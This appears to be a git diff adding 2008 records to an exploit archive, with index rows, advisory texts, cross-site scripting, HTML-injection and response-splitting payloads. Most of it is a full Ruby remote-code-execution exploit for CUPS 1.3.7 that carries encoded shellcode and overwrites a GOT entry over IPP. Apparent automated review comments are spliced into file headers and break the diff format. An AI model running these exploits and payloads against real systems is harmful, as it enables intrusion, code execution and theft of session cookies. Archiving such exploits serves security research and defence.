diff --git a/files.csv b/files.csv
index f504aa7f6..eb8cc1d3b 100755
--- a/files.csv
+++ b/files.csv
@@ -29222,3 +29222,21 @@ id,file,description,date,author,platform,type,port
 32455,platforms/php/webapps/32455.pl,"Website Directory 'index.php' Cross-Site Scripting Vulnerability",2008-10-03,"Ghost Hacker",php,webapps,0
 32456,platforms/windows/remote/32456.txt,"RhinoSoft Serv-U FTP Server 7.2.0.1 'rnto' Command Directory Traversal Vulnerability",2008-10-03,dmnt,windows,remote,0
 32457,platforms/windows/remote/32457.txt,"XAMPP for Windows 1.6.8 'cds.php' SQL Injection Vulnerability",2008-10-03,"Jaykishan Nirmal",windows,remote,0
+32458,platforms/multiple/remote/32458.txt,"OpenNMS 1.5.x HTTP Response Splitting Vulnerability",2008-10-05,"BugSec LTD",multiple,remote,0
+32459,platforms/java/webapps/32459.txt,"VeriSign Kontiki Delivery Management System 5.0 'action' Parameter Cross Site Scripting Vulnerability",2008-10-05,"Mazin Faour",java,webapps,0
+32460,platforms/windows/remote/32460.txt,"XAMPP for Windows 1.6.8 'phonebook.php' SQL Injection Vulnerability",2008-10-06,"Jaykishan Nirmal",windows,remote,0
+32461,platforms/php/webapps/32461.txt,"AmpJuke 0.7.5 'index.php' SQL Injection Vulnerability",2008-10-03,S_DLA_S,php,webapps,0
+32462,platforms/php/webapps/32462.txt,"Simple Machines Forum 1.1.6 HTTP POST Request Filter Security Bypass Vulnerability",2008-10-06,WHK,php,webapps,0
+32463,platforms/php/webapps/32463.txt,"PHP Web Explorer 0.99b main.php refer Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0
+32464,platforms/php/webapps/32464.txt,"PHP Web Explorer 0.99b edit.php file Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0
+32465,platforms/windows/remote/32465.pl,"Internet Download Manager <= 4.0.5 File Parsing Buffer Overflow Vulnerability",2008-10-06,Ciph3r,windows,remote,0
+32466,platforms/multiple/remote/32466.html,"Mozilla Firefox <= 3.0.3 Internet Shortcut Same Origin Policy Violation Vulnerability",2008-10-07,"Liu Die Yu",multiple,remote,0
+32467,platforms/php/webapps/32467.txt,"Opera Web Browser <= 8.51 URI Redirection Remote Code Execution Vulnerability",2008-10-08,MATASANOS,php,webapps,0
+32468,platforms/php/webapps/32468.txt,"DFFFrameworkAPI 'DFF_config[dir_include]' Parameter Multiple Remote File Include Vulnerabilities",2008-10-08,GoLd_M,php,webapps,0
+32469,platforms/hardware/remote/32469.txt,"Proxim Tsunami MP.11 2411 Wireless Access Point 'system.sysName.0' SNMP HTML Injection Vulnerability",2008-10-09,"Adrian Pastor",hardware,remote,0
+32470,platforms/linux/remote/32470.rb,"CUPS <= 1.3.7 'HP-GL/2' Filter Remote Code Execution Vulnerability",2008-10-09,regenrecht,linux,remote,0
+32471,platforms/linux/dos/32471.txt,"KDE Konqueror 3.5.9 JavaScript 'load' Function Denial of Service Vulnerability",2008-10-10,"Jeremy Brown",linux,dos,0
+32472,platforms/hardware/dos/32472.txt,"Nokia Web Browser for S60 Infinite Array Sort Denial of Service Vulnerability",2008-10-10,"Luca Carettoni",hardware,dos,0
+32473,platforms/php/webapps/32473.txt,"'com_jeux' Joomla! Component 'id' Parameter SQL Injection Vulnerability",2008-10-11,H!tm@N,php,webapps,0
+32474,platforms/php/webapps/32474.txt,"EEB-CMS 0.95 'index.php' Cross-Site Scripting Vulnerability",2008-10-11,d3v1l,php,webapps,0
+32475,platforms/multiple/remote/32475.sql,"Oracle Database Server <= 11.1 'CREATE ANY DIRECTORY' Privilege Escalation Vulnerability",2008-10-13,"Paul M. Wright",multiple,remote,0
diff --git a/platforms/hardware/dos/32472.txt b/platforms/hardware/dos/32472.txt
new file mode 100755
index 000000000..82b733f72
--- /dev/null
+++ b/platforms/hardware/dos/32472.txt
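Review bot: The new 32467 row files an Opera Web Browser <= 8.51 issue under `platforms/php/webapps/32467.txt` with platform `php` and type `webapps`, which does not fit a browser-side bug; the neighbouring browser record 32466 (Firefox) uses `multiple,remote`. Anyone filtering this index by platform/type for triage or coverage checks would miss it, so unless the path is already fixed by the archive workflow I would expect `...,multiple,remote,0` and a matching `platforms/multiple/remote/` location. The same classification question applies to 32460, where an XAMPP 'phonebook.php' SQL injection is recorded as `windows,remote` (consistent with the existing 32457 row) rather than `php,webapps`; if that is a deliberate convention for XAMPP records, a comment in the commit message would save the next reader the guess.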
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/31703/info
+
+Nokia Web Browser for S60 is prone to a denial-of-service vulnerability when handling malicious HTML files.
+
+A successful exploit of this issue allows remote attackers to consume excessive system resources in the affected browser, which will cause the application to crash and deny service to legitimate users. Attackers may also be able to run arbitrary code, but this has not been confirmed.
+
+
\ No newline at end of file
diff --git a/platforms/hardware/remote/32469.txt b/platforms/hardware/remote/32469.txt
new file mode 100755
index 000000000..5c1751756
--- /dev/null
+++ b/platforms/hardware/remote/32469.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31666/info
+
+The Proxim Tsunami MP.11 2411 Wireless Access Point is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+Attacker-supplied HTML and script code would run in the context of the web interface of the affected device, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
+
+This issue is reported in the Tsunami MP.11 Model 2411; additional products may also be vulnerable.
+
+$ snmpset -v1 -c public 192.168.1.100 sysName.0 s'">'
\ No newline at end of file
diff --git a/platforms/java/webapps/32459.txt b/platforms/java/webapps/32459.txt
new file mode 100755
index 000000000..b0de0c467
--- /dev/null
+++ b/platforms/java/webapps/32459.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31580/info
+
+Kontiki Delivery Management System is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Kontiki Delivery Management System 5.0 and prior versions are vulnerable.
+
+http://www.example.com/zodiac/servlet/zodiac?action=%3Cscript%3Ealert(document.cookie)%3C/script%3E
\ No newline at end of file
diff --git a/platforms/linux/dos/32471.txt b/platforms/linux/dos/32471.txt
new file mode 100755
index 000000000..0c63bfa0c
--- /dev/null
+++ b/platforms/linux/dos/32471.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31696/info
+
+KDE Konqueror is prone to a remote denial-of-service vulnerability because it fails to handle specially crafted JavaScript code.
+
+An attacker may exploit this vulnerability to cause Konqueror to crash, resulting in denial-of-service conditions.
+
+The issue affects Konqueror 3.5.9; other versions may also be affected.
+
+
\ No newline at end of file
diff --git a/platforms/linux/remote/32470.rb b/platforms/linux/remote/32470.rb
new file mode 100755
index 000000000..fc5cce548
--- /dev/null
+++ b/platforms/linux/remote/32470.rb
@@ -0,0 +1,185 @@
+source: http://www.securityfocus.com/bid/31688/info
+
+CUPS is prone to a remote code-execution vulnerability caused by an error in the 'HP-GL/2 filter.
+
+Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will likely cause a denial-of-service condition. Note that local users may also exploit this vulnerability to elevate privileges.
+
+Successful remote exploits may require printer sharing to be enabled on the vulnerable system.
+
+The issue affects versions prior to CUPS 1.3.9.
+
+NOTE: This issue was previously discussed in BID 31681 (Apple Mac OS X 2008-007 Multiple Security Vulnerabilities), but has been assigned its own record to better document the vulnerability.
+
+#!/usr/bin/ruby -w
+
+# CUPS 1.3.7 (HP-GL/2 filter) remote code execution
+# gives uid=2(daemon) gid=7(lp) groups=7(lp)
+# linux 2.6.25/randomize_va_space = 1, glibc 2.7
+#
+# An Introduction to HP-GL/2 Graphics
+# http://www.tech-diy.com/HP%20Graphics%20Language.htm
+# Internet Printing Protocol/1.1: Encoding and Transport
+# http://tools.ietf.org/html/rfc2910
+# Internet Printing Protocol/1.1: Model and Semantics
+# http://tools.ietf.org/html/rfc2911
+
+# :::::::::::::::::::::::::::::::::: setup ::::::::::::::::::::::::::::::::::
+
+host = '127.0.0.1'
+port = 631
+printer = 'Virtual_Printer'
+
+Pens_addr = 0x08073600 # objdump -T hpgltops | grep Pens$
+fprintf_got = 0x080532cc # objdump -R hpgltops | grep fprintf
+
+# linux_ia32_exec - CMD=/bin/touch /tmp/yello Size=84, metasploit.com
+# encoder=PexFnstenvSub, restricted chars: 0xff
+shellcode =
+ "\x2b\xc9\x83\xe9\xf1\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7c" +
+ "\x48\x22\xd6\x83\xeb\xfc\xe2\xf4\x16\x43\x7a\x4f\x2e\x2e\x4a\xfb" +
+ "\x1f\xc1\xc5\xbe\x53\x3b\x4a\xd6\x14\x67\x40\xbf\x12\xc1\xc1\x84" +
+ "\x94\x5e\x22\xd6\x7c\x67\x40\xbf\x12\x67\x56\xb9\x09\x2b\x4a\xf6" +
+ "\x53\x3c\x4f\xa6\x53\x31\x47\xba\x10\x27\x22\x81\x2f\xc1\xc3\x1b" +
+ "\xfc\x48\x22\xd6";
+
+# :::::::::::::::::::::::::::::::::: code :::::::::::::::::::::::::::::::::::
+
+# beacause of hpgl-attr.c:68-73 and 269-274
+def CR_setup()
+ "CR0,1,0,1,0,1;"
+end
+
+# PS is a bit tricky here. final weight of pen (PW code) is calculated as:
+# weight*=hypot(ps[0],ps[1])/1016.0*72.0 (which is NOT hypot/73152.0),
+# where ps0=72.0*arg1/1016.0 and ps1=72.0*arg2/1016.0.
+# so, hoping to get things accurate I set multiplier to 1.0
+def PS_setup()
+ "WU1;" + # set the units used for pen widths
+ "RO0;" + # (do not) rotate the plot
+ "PS0,199.123455;"; # set the plot size
+end
+
+# alternative approach to fight floating point rounding errors
+# first one seems to be more successful, though
+def PS_setup_alt()
+ "WU0;" +
+ "RO0;";
+end
+
+# set the pen width (PS!)
+def PW(width, pen)
+ "PW#{width},#{pen};"
+end
+
+def PW_alt(width, pen)
+ "PW#{width*25.4/72.0},#{pen};"
+end
+
+# "Set the pen color..."
+def PC(pen, r, g, b)
+ "PC#{pen},#{r},#{g},#{b};"
+end
+
+# we'll be storing shellcode in Pens[1024] static buffer
+# typedef struct
+# {
+# float rgb[3]; /* Pen color */
+# float width; /* Pen width */
+# } pen_t;
+def memcpy(data)
+ while (data.length % 16 != 0)
+ data += "\x90";
+ end
+ s = ''
+ a = 0, b = 0, i = 0
+ data.unpack('f*').each { |f|
+ case ((i += 1) % 4)
+ when 1: a = f
+ when 2: b = f
+ when 3: s += PC(i/4, a, b, f)
+ else s += PW(f, (i-1)/4)
+ end
+ }
+ return s;
+end
+
+# overwrite all 16 bytes with the same value
+def poke(addr, value)
+ f = [value].pack('i').unpack('f') # floatyfication!
+ i = (addr-Pens_addr)/16
+ return PC(i, f, f, f) + PW(f, i)
+end
+
+hpgl_data =
+ "BP;" + # to be recognized by CUPS
+ CR_setup() +
+ PS_setup() +
+ memcpy(shellcode) +
+ poke(fprintf_got, Pens_addr) +
+ PC(0, 0, 0, 0); # whatever
+
+def attribute(tag, name, value)
+ [tag].pack('C') +
+ [name.length].pack('n') +
+ name +
+ [value.length].pack('n') +
+ value
+end
+
+# tag - meaning (rfc2910#section-3.5)
+# 0x42 nameWithoutLanguage
+# 0x45 uri
+# 0x47 charset
+# 0x48 naturalLanguage
+operation_attr =
+ attribute(0x47, 'attributes-charset', 'utf-8') +
+ attribute(0x48, 'attributes-natural-language', 'en-us') +
+ attribute(0x45, 'printer-uri', "http://#{host}:#{port}/printers/#{printer}") +
+ attribute(0x42, 'job-name', 'zee greeteengz') +
+ attribute(0x42, 'document-format', 'application/vnd.hp-HPGL');
+
+ipp_data =
+ "\x01\x00" + # version-number: 1.0
+ "\x00\x02" + # operation-id: Print-job
+ "\x00\x00\x00\x01" + # request-id: 1
+ "\x01" + # operation-attributes-tag
+ operation_attr +
+ "\x02" + # job-attributes-tag
+ "\x03" + # end-of-attributes-tag
+ hpgl_data;
+
+http_request =
+"""POST /printers/#{printer} HTTP/1.1
+Content-Type: application/ipp
+User-Agent: Internet Print Provider
+Host: #{host}
+Content-Length: #{ipp_data.length}
+Connection: Keep-Alive
+Cache-Control: no-cache
+"""
+
+require 'socket'
+NL = "\r\n"
+
+if (false)
+ # ./hpgltops 0 none none 1 '' output.hpgl
+ puts hpgl_data
+ puts "[+] dumping HP/GL-2 into output.hpgl"
+ f = File.new('output.hpgl', 'w')
+ f.write(hpgl_data)
+ f.close()
+ exit(0)
+end
+
+puts "[+] connecting to #{host}:#{port}"
+s = TCPSocket.open(host, port)
+puts "[+] asking #{printer} for a printout"
+http_request.each_line { |line|
+ s.write(line.strip + NL)
+}
+s.write(NL)
+s.write(ipp_data)
+s.read(1)
+s.close()
+puts "[+] done"
+
diff --git a/platforms/multiple/remote/32458.txt b/platforms/multiple/remote/32458.txt
new file mode 100755
index 000000000..39ebdd699
--- /dev/null
+++ b/platforms/multiple/remote/32458.txt
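Review bot: The SecurityFocus advisory paragraphs at the top of `platforms/linux/remote/32470.rb` (the `source:` line through the `NOTE:` paragraph) sit above the `#!/usr/bin/ruby -w` shebang as bare text, so the archived file is not syntactically valid Ruby and the mode-100755 shebang is inert; the other records in this commit are `.txt` files where that prefix is harmless. If the archive convention is to keep the provenance header in every record, the consistent form here is to prefix each of those lines with `#`, e.g. `# source: http://www.securityfocus.com/bid/31688/info`, which preserves the reference and the fixed-version statement ("versions prior to CUPS 1.3.9") that a defender verifying patch state needs. The existing header comment already notes that `Pens_addr` and `fprintf_got` were taken from one `hpgltops` binary via `objdump`, and the `linux_ia32_exec` comment documents the payload as `/bin/touch /tmp/yello`; a one-line summary of that in the record description would make the index entry more useful for triage than the title alone.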
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/31577/info
+
+OpenNMS is prone to an HTTP response-splitting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Attackers can leverage this issue to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust.
+
+Versions prior to OpenNMS 1.5.94 are vulnerable.
+
+http://www.example.com/opennms/event/query?%0D%0AContent-Length:%200%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%20text
+/html%0D%0AContent-Length:%2036%0D%0A%0D%0ABugSec